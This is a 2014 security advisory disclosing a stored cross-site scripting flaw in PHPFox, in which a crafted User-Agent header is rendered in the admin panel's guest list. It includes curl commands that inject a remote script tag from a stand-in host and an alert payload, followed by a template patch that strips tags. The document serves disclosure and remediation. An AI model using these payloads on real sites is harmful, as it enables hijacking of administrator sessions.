PHPFox Cross Site Scripting

2014-11-18T00:00:00
ID PACKETSTORM:129153
Type packetstorm
Reporter Wesley Henrique Leite
Modified 2014-11-18T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
CNA primary  
MITRE Corporation ( cve-assign [ \\**NOSPAM\\ ] mitre \\NOSPAM\\ org )  
  
Software Vendors  
http://moxi9.com/phpfox  
Product: PhpFox  
Version: ALL  
  
Research  
Wesley Henrique Leite ( wesleyhenrique [\\NOSPAM**] gmail \\NOSPAM// com )  
  
  
[+] INFORMATION  
Vendor Notified : 2014-10-22  
Vendor Homepage : http://moxi9.com/phpfox  
  
Response Vendor: fixed 2014-10-23 (to v4 Beta)  
  
[+] DESCRIPTION  
  
The system stores all urls accessed in a database table, below  
information in the same 'phpfox_log_session'  
  
[phpfox]> desc phpfox_log_session;  
+---------------+----------------------+------+-----+---------+-------+  
| Field | Type | Null | Key | Default | Extra |  
+---------------+----------------------+------+-----+---------+-------+  
| session_hash | char(32) | NO | MUL | NULL | |  
| id_hash | char(32) | NO | | NULL | |  
| captcha_hash | char(32) | YES | MUL | NULL | |  
| user_id | int(10) unsigned | NO | MUL | NULL | |  
| last_activity | int(10) unsigned | NO | MUL | NULL | |  
| location | varchar(255) | YES | | NULL | |  
| is_forum | tinyint(1) | NO | | NULL | |  
| forum_id | smallint(4) unsigned | NO | | NULL | |  
| im_status | tinyint(1) | NO | | 0 | |  
| im_hide | tinyint(1) | NO | | 0 | |  
| ip_address | varchar(15) | NO | | NULL | |  
| user_agent | varchar(100) | NO | | NULL | |  
+---------------+----------------------+------+-----+---------+-------+  
  
the column that can be manipulated is:  
-> user_agent (100)  
  
all acess store in the system, such as bots and users wandering around the  
web site, can be seen in:  
  
AdminCP  
TOOLS > Online > Guests/Boots  
  
Output  
| IP ADDRESS | User-Agent | ...   
  
knowing this, the following code was created to inject a script into the   
AdminCP with User-Agent.  
  
$ curl -A "<script src='http://www.example.com/script.js'></script>" \  
http://www.meusite.com.br/  
  
OR  
  
$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/  
  
when any user with administrative access in.  
'AdminCP'   
TOOLS > Online > Guests/Boots   
  
we have the script running in the administrative area.  
  
  
[+] My Solution  
  
(line 1.8)  
  
1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 10:00:11 2014 -0200  
1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 12:28:39 2014 -0200  
1.3 @@ -25,7 +25,7 @@  
1.4 {foreach from=$aGuests key=iKey item=aGuest}  
1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">  
1.6 <td><a href="{url link='admincp.core.ip' search=$aGuest.ip_address_search}" title="{phrase var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>  
1.7 - <td>{$aGuest.user_agent}</td>  
1.8 + <td>{$aGuest.user_agent|strip_tags}</td>  
1.9 <td class="t_center">  
1.10 <div class="js_item_is_active"{if !$aGuest.ban_id} style="display:none;"{/if}>  
1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0" class="js_item_active_link" title="{phrase var='admincp.unban'}">{img theme='misc/bullet_green.png' alt=''}</a>  
1.12 @@ -43,4 +43,4 @@  
1.13 <div class="extra_info">  
1.14 {phrase var='admincp.no_guests_online'}  
1.15 </div>  
1.16 -{/if}  
1.17 \ No newline at end of file  
1.18 +{/if}  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2.0.22 (GNU/Linux)  
  
iQIcBAEBAgAGBQJUZLi0AAoJEDGxib0S8PLVo48P/2rcvW9s777zPbcqAW2T8ymd  
OQN2wOnZeCWqAJOIWxOQCXUuPjmuEkXuH/rxn8scBTKY3iluv1uy53w+DwP3gsDm  
3r4uur1W28soZ6/uyEQvySfI202gY5nOS1e07ezIrIm7Q9Fc6ibYVtmJ/A04gWEA  
DIz1otTEB47/4tHGcm651DOOoSmLLEWImpUzUZgBKXlU2OdsLMPDvempTBPsqGCl  
ENWI86kUUIQ18xhHttAGY96fjYWEXW4bogg4O5G3E9TUEsEXf+qo2pUrPT+AJNMA  
2HS+jzPhnmhhGsufQ9m7VxY8tsBM/ciiGQNeHrOGDiZtR2sSaXDW8eCgs1W+Hwbb  
CKtqG2CTgL7YADI1I7qo6b24GDz2NqeICaFoOvt2WsqD51WVtTfLctMAIKsM9jGF  
Jtflp44QMbH+DS0QklvL1N6vifgosFkzUejDRZGmQ/gOntlrBLfOsmJMEvuE38ip  
G4eocs5Cl4dIVwEioLjw2RT9xGxAhkCsBZaD+UTGA+VfRo5KvNnHCYtarmL8RJAK  
tWQtVuO/wAY5rk38hBooqWXrSYWgor1cFr69YZngp8ersnW4BS4dSiZju3vT91+a  
LEA+nugK6GUdCsD3JNRjuVSI7KKtjWL9DQD4WxN1EhSQ9EzPHXx8PciVUe/QplBU  
k6e1xQ6TG1PM8XwOHJGJ  
=twLD  
-----END PGP SIGNATURE-----  
`